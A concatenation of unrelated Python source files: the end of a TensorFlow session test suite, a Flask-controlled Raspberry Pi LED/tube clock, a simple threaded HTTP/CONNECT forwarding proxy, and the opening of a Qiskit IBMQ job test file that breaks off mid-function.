'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(sess.run(feed_t, feed_dict={feed_t: c_list}),
c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01',
u'\u26a3 unicode', u'\U0001f60e deal with it']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(constant_op.constant(1.0), options=None,
run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/gpu:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(d, feed_dict={a: 1.0},
options=run_options, run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(
capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
@test_util.disable_c_api # set_device does not work with C API
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor,
fetch_fn, feed_fn1, feed_fn2)
with self.test_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(squared_tensor, feed_dict={
squared_tensor : np1 * np1})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
# Passing the config to the server, but not the session should still result
# in logging device placement.
config = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/job:local/replica:0/task:0/cpu:0' in str(log), str(log))
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = control_flow_ops.enter(data, 'foo_1', False)
enter_2 = control_flow_ops.enter(data, 'foo_2', False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testGraphOptimizer(self):
rewrite_options = rewriter_config_pb2.RewriterConfig(
disable_model_pruning=False, constant_folding=True)
graph_options = config_pb2.GraphOptions(
rewrite_options=rewrite_options, build_cost_model=1)
config = config_pb2.ConfigProto(graph_options=graph_options)
with ops.Graph().as_default() as g:
r1 = random_ops.random_normal(shape=[2, 3], name='R1')
r2 = random_ops.random_normal(shape=[2, 3], name='R2')
copy1 = array_ops.stop_gradient(r1)
copy2 = array_ops.identity(r2)
result = copy1 + copy2
with session.Session(graph=g, config=config) as sess:
metadata = config_pb2.RunMetadata()
sess.run(result, run_metadata=metadata)
# Check that we optimized the graph by looking at the cost model: the add
# node should have been reconnected directly to the R1 and R2 nodes.
found_valid_nodes = 0
for node in metadata.cost_graph.node:
if node.name == 'R1':
r1_cost_id = node.id
found_valid_nodes += 1
if node.name == 'R2':
r2_cost_id = node.id
found_valid_nodes += 1
if node.name == 'add':
if node.input_info[0].preceding_node == r1_cost_id:
self.assertEqual(node.input_info[1].preceding_node, r2_cost_id)
found_valid_nodes += 1
elif node.input_info[0].preceding_node == r2_cost_id:
self.assertEqual(node.input_info[1].preceding_node, r1_cost_id)
found_valid_nodes += 1
self.assertEqual(3, found_valid_nodes)
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
@test_util.disable_c_api # functions don't work with C API
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
@test_util.disable_c_api # functions don't work with C API
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
if __name__ == '__main__':
googletest.main()
|
rpi_led_clock.py
|
#!/usr/bin/env python3
import argparse
import datetime
import time
import threading
import sys
try:
import RPi.GPIO as GPIO
gpio_present = True
except ModuleNotFoundError:
print("RPi.GPIO module not present, forcing a dry run")
gpio_present = False
from flask import Flask, request, render_template
global time_input
global update_needed
global blank_requested
app = Flask(__name__)
# Channels in use that need to be set as output.
channels = list(range(0, 28))
# Pins corresponding to each segment per digit TODO: Actually map the pins
pins_per_segment = {
0: (0, 1, 2, 3, 4, 5, 6),
1: (7, 8, 9, 10, 11, 12, 13),
2: (14, 15, 16, 17, 18, 19, 20),
3: (21, 22, 23, 24, 25, 26, 27),
}
# Pin controlling the colon between hour and minute digits - not used at the moment
# colon = 29
# Segments:
# 0 - top, 1 - upper right, 2 - upper left, 3 - bottom right, 4 - bottom left, 5 - bottom, 6 - crossbar
# Segments used for each digit; 0, 1 = off, on.
digits = {
"0": (1, 1, 1, 1, 1, 1, 0), # 0
"1": (0, 1, 1, 0, 0, 0, 0), # 1
"2": (1, 1, 0, 1, 1, 0, 1), # 2
"3": (1, 1, 1, 1, 0, 0, 1), # 3
"4": (0, 1, 1, 0, 0, 1, 1), # 4
"5": (1, 0, 1, 1, 0, 1, 1), # 5
"6": (1, 0, 1, 1, 1, 1, 1), # 6
"7": (1, 1, 1, 0, 0, 0, 0), # 7
"8": (1, 1, 1, 1, 1, 1, 1), # 8
"9": (1, 1, 1, 1, 0, 1, 1), # 9
" ": (0, 0, 0, 0, 0, 0, 0), # blank display
}
class LedClock:
def __init__(self, dry_run=0):
self.display = ""
self.dry_run = dry_run
def set_segment(self, segment, digit_position, state):
if self.dry_run:
print(f"Setting pin # {pins_per_segment[digit_position][segment]} to {state == 0}")
print(f"Segment {segment} is now {'down' if (state == 0) else 'up'}")
else:
# We disable a segment by setting a GPIO pin to HIGH state
GPIO.output(pins_per_segment[digit_position][segment], state == 0)
def set_digit(self, digit, digit_position):
for segment in range(0, 7):
self.set_segment(segment, digit_position, digits[digit][segment])
def update_display(self):
for i in range(0, 4):
self.set_digit(self.display[i], i)
def blank_display(self):
print("Blanking display and stopping updates until a new time is input")
self.display = " "
self.update_display()
class TubeClock(LedClock):
def __init__(self, dry_run=0):
super().__init__(dry_run)
self.digit_mapping = {
0: (None, 0, 1),
1: (2, 3, 4, 5, 6, 7, 8, 9, 10, 11),
2: (12, 13, 14, 15, 16, 17),
3: (18, 19, 20, 21, 22, 23, 24, 25, 26, 27)
}
def set_digit(self, digit, digit_position):
for i in self.digit_mapping[digit_position]:
if i is None:
if self.dry_run:
print(
f"Digit {self.digit_mapping[digit_position].index(i)} at position {digit_position} not "
f"enabled, skipping")
else:
continue
elif str(self.digit_mapping[digit_position].index(i)) != digit:
if self.dry_run:
print(f"Setting GPIO pin {i} to GPIO.HIGH")
else:
GPIO.output(i, GPIO.HIGH)
elif str(self.digit_mapping[digit_position].index(i)) == digit:
if self.dry_run:
print(f"Setting GPIO pin {i} to GPIO.LOW")
else:
GPIO.output(i, GPIO.LOW)
def gpio_setup(channel_list):
GPIO.setmode(GPIO.BCM)
GPIO.setup(channel_list, GPIO.OUT, initial=GPIO.HIGH)
def parse_arguments():
parser = argparse.ArgumentParser(description="Display time on a 7-segment LED clock")
parser.add_argument("--time", metavar="HHMM", type=str, nargs="?", help="Hour to display on the clock. If not "
"specified, clock will start blanked")
parser.add_argument("--dry_run", action="store_true", help="If set, do a dry run and do not set any GPIO pins")
parser.add_argument("--type", action="store", type=str, nargs="?", default="tube",
help='Type of clock. Allowed values "tube" (default) and "led"')
return parser.parse_args()
def is_time(string):
if not len(string) == 4:
return False
elif int(string[0:2]) in range(24) and int(string[2:4]) in range(60):
return True
else:
return False
@app.route('/', methods=["GET", "POST"])
def index():
if request.method == "POST":
global time_input
global update_needed
global blank_requested
if is_time(request.form["time"]):
time_input = request.form["time"]
update_needed = True
blank_requested = False
elif (request.form["time"]) == "":
blank_requested = True
print("Requesting blank")
else:
print(f"Unrecognised input {request.form['time']}")
return render_template('index.html')
def start_display(new_time):
global time_input
global update_needed
global blank_requested
update_needed = False
display_blanked = False
if new_time is None:
blank_requested = True
new_time = datetime.datetime.now()
else:
blank_requested = False
while True:
if update_needed:
new_time = datetime.datetime(100, 1, 1, int(time_input[0:2]), int(time_input[2:]), 00)
update_needed = False
display_blanked = False
if not blank_requested and new_time.strftime("%H%M") != x.display:
x.display = new_time.strftime("%H%M")
x.update_display()
print(f"setting display to {new_time.strftime('%H%M')}")
if blank_requested and not display_blanked:
x.blank_display()
display_blanked = True
time.sleep(1)
new_time = new_time + datetime.timedelta(seconds=1)
if __name__ == '__main__':
args = parse_arguments()
if args.time is None:
starting_time = None
elif is_time(args.time):
starting_time = datetime.datetime(100, 1, 1, int(args.time[0:2]), int(args.time[2:]), 00)
else:
print(f"Unrecognised --time argument, exiting")
sys.exit(1)
if args.dry_run or gpio_present is False:
force_dry_run = True
else:
force_dry_run = False
try:
if not force_dry_run:
gpio_setup(channels)
if args.type == "tube":
x = TubeClock(dry_run=force_dry_run)
elif args.type == "led":
x = LedClock(dry_run=force_dry_run)
else:
print("Unknown clock type, aborting")
sys.exit(1)
display_thread = threading.Thread(target=start_display, args=(starting_time,), daemon=True)
display_thread.start()
app.run(host="0.0.0.0", port=1080)
except KeyboardInterrupt:
print("Received a keyboard interrupt, cleaning up GPIO")
finally:
if not force_dry_run:
GPIO.cleanup()
|
server.py
|
__author__ = 'ziyan.yin'
import logging
import socket
import threading
TIMEOUT = 1000
BUF_SIZE = 4096
HOST = '0.0.0.0'
PORT = 11212
_logger = logging.getLogger('proxy')
def get_addr(package):
data = package.split(b'\r\n')
method = data[0]
is_ssl = False
if method.startswith(b'CONNECT'):
addr = method.split(b' ')[1].decode()
if ':' in addr:
host = addr[:addr.find(':')]
port = int(addr[addr.find(':') + 1:])
else:
host = addr
port = 443
is_ssl = True
else:
for header in data:
if header.startswith(b'Host'):
addr = header.split(b' ')[1].decode()
break
else:
addr = method.split(b'/')[2].decode()
if ':' in addr:
host = addr[:addr.find(':')]
port = int(addr[addr.find(':')+1:])
else:
host = addr
port = 80
protocol = method.split(b' ')[2].decode()
return host, port, is_ssl, protocol
def communicate(client, server):
try:
while data := client.recv(BUF_SIZE):
server.sendall(data)
except Exception as ex:
_logger.error(ex)
finally:
server.close()
def handle(client):
client.settimeout(TIMEOUT)
message = b''
try:
while data := client.recv(BUF_SIZE):
message = b"%s%s" % (message, data)
if data.endswith(b'\r\n\r\n'):
break
except ConnectionError:
return
if not message:
client.close()
return
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host, port, is_ssl, protocol = get_addr(message)
_logger.info((host, port))
try:
server.connect((host, port))
server.settimeout(TIMEOUT)
if is_ssl:
data = f"{protocol} 200 Connection Established\r\n\r\n".encode()
client.sendall(data)
threading.Thread(target=communicate, args=(client, server)).start()
threading.Thread(target=communicate, args=(server, client)).start()
else:
server.sendall(message)
threading.Thread(target=communicate, args=(client, server)).start()
threading.Thread(target=communicate, args=(server, client)).start()
except ConnectionError:
server.close()
client.close()
def main(**kwargs):
global HOST
global PORT
global TIMEOUT
if 'host' in kwargs:
HOST = kwargs['host']
if 'port' in kwargs:
PORT = kwargs['port']
if 'timeout' in kwargs:
TIMEOUT = kwargs['timeout']
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((HOST, PORT))
server.listen(10)
_logger.info(f'proxy start on {PORT}')
while True:
conn, addr = server.accept()
_logger.debug(addr)
threading.Thread(target=handle, args=(conn,)).start()
|
test_ibmq_job.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""IBMQJob Test."""
import time
import copy
from datetime import datetime, timedelta
from unittest import SkipTest, mock
from threading import Thread, Event
from dateutil import tz
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.test import slow_test
from qiskit.test.reference_circuits import ReferenceCircuits
from qiskit.compiler import transpile
from qiskit.result import Result
from qiskit.providers.jobstatus import JobStatus, JOB_FINAL_STATES
from qiskit.providers.ibmq import least_busy
from qiskit.providers.ibmq.apiconstants import ApiJobStatus, API_JOB_FINAL_STATES
from qiskit.providers.ibmq.ibmqbackend import IBMQRetiredBackend
from qiskit.providers.ibmq.exceptions import IBMQBackendError, IBMQBackendApiError
from qiskit.providers.ibmq.utils.utils import api_status_to_job_status
from qiskit.providers.ibmq.job.exceptions import IBMQJobTimeoutError
from qiskit.providers.ibmq.utils.converters import local_to_utc
from qiskit.providers.ibmq.api.rest.job import Job as RestJob
from qiskit.providers.ibmq.api.exceptions import RequestsApiError
from ..ibmqtestcase import IBMQTestCase
from ..decorators import (requires_provider, requires_device)
from ..utils import (most_busy_backend, get_large_circuit, cancel_job,
submit_job_bad_shots, submit_and_cancel, submit_job_one_bad_instr)
class TestIBMQJob(IBMQTestCase):
"""Test ibmqjob module."""
@classmethod
@requires_provider
def setUpClass(cls, provider):
"""Initial class level setup."""
# pylint: disable=arguments-differ
super().setUpClass()
cls.provider = provider
cls.sim_backend = provider.get_backend('ibmq_qasm_simulator')
cls.bell = transpile(ReferenceCircuits.bell(), cls.sim_backend)
cls.sim_job = cls.sim_backend.run(cls.bell, validate_qobj=True)
cls.last_month = datetime.now() - timedelta(days=30)
@slow_test
@requires_device
def test_run_device(self, backend):
"""Test running in a real device."""
shots = 8192
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
validate_qobj=True, shots=shots)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result = job.result()
counts_qx = result.get_counts(0)
counts_ex = {'00': shots / 2, '11': shots / 2}
self.assertDictAlmostEqual(counts_qx, counts_ex, shots * 0.2)
# Test fetching the job properties, as this is a real backend and is
# guaranteed to have them.
self.assertIsNotNone(job.properties())
def test_run_multiple_simulator(self):
"""Test running multiple jobs in a simulator."""
num_qubits = 16
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 5
job_array = [self.sim_backend.run(transpile([qc] * 20), validate_qobj=True, shots=2048)
for _ in range(num_jobs)]
timeout = 30
start_time = time.time()
while True:
check = sum(
[job.status() is JobStatus.RUNNING for job in job_array])
if check >= 2:
self.log.info('found %d simultaneous jobs', check)
break
if all([job.status() is JobStatus.DONE for job in job_array]):
# done too soon? don't generate error
self.log.warning('all jobs completed before simultaneous jobs '
'could be detected')
break
for job in job_array:
self.log.info('%s %s %s %s', job.status(), job.status() is JobStatus.RUNNING,
check, job.job_id())
self.log.info('- %s', str(time.time() - start_time))
if time.time() - start_time > timeout:
raise TimeoutError('Failed to see multiple running jobs after '
'{0} seconds.'.format(timeout))
time.sleep(0.2)
result_array = [job.result() for job in job_array]
self.log.info('got back all job results')
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
@slow_test
@requires_device
def test_run_multiple_device(self, backend):
"""Test running multiple jobs in a real device."""
num_qubits = 5
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 3
job_array = [backend.run(transpile(qc, backend=backend), validate_qobj=True)
for _ in range(num_jobs)]
time.sleep(3) # give time for jobs to start (better way?)
job_status = [job.status() for job in job_array]
num_init = sum(
[status is JobStatus.INITIALIZING for status in job_status])
num_queued = sum([status is JobStatus.QUEUED for status in job_status])
num_running = sum(
[status is JobStatus.RUNNING for status in job_status])
num_done = sum([status is JobStatus.DONE for status in job_status])
num_error = sum([status is JobStatus.ERROR for status in job_status])
self.log.info('number of currently initializing jobs: %d/%d',
num_init, num_jobs)
self.log.info('number of currently queued jobs: %d/%d',
num_queued, num_jobs)
self.log.info('number of currently running jobs: %d/%d',
num_running, num_jobs)
self.log.info('number of currently done jobs: %d/%d',
num_done, num_jobs)
self.log.info('number of errored jobs: %d/%d',
num_error, num_jobs)
self.assertTrue(num_jobs - num_error - num_done > 0)
# Wait for all the results.
for job in job_array:
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result_array = [job.result() for job in job_array]
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
def test_cancel(self):
"""Test job cancellation."""
# Find the most busy backend
backend = most_busy_backend(self.provider)
submit_and_cancel(backend)
def test_retrieve_jobs(self):
"""Test retrieving jobs."""
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=5, skip=0, start_datetime=self.last_month)
self.assertLessEqual(len(job_list), 5)
for job in job_list:
self.assertTrue(isinstance(job.job_id(), str))
def test_retrieve_job(self):
"""Test retrieving a single job."""
retrieved_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertEqual(self.sim_job.job_id(), retrieved_job.job_id())
self.assertEqual(self.sim_job.qobj().to_dict(), retrieved_job.qobj().to_dict())
self.assertEqual(self.sim_job.result().get_counts(), retrieved_job.result().get_counts())
@requires_device
def test_retrieve_job_uses_appropriate_backend(self, backend):
"""Test that retrieved jobs come from their appropriate backend."""
backend_1 = backend
# Get a second backend.
backend_2 = None
provider = backend.provider()
for my_backend in provider.backends():
if my_backend.status().operational and my_backend.name() != backend_1.name():
backend_2 = my_backend
break
if not backend_2:
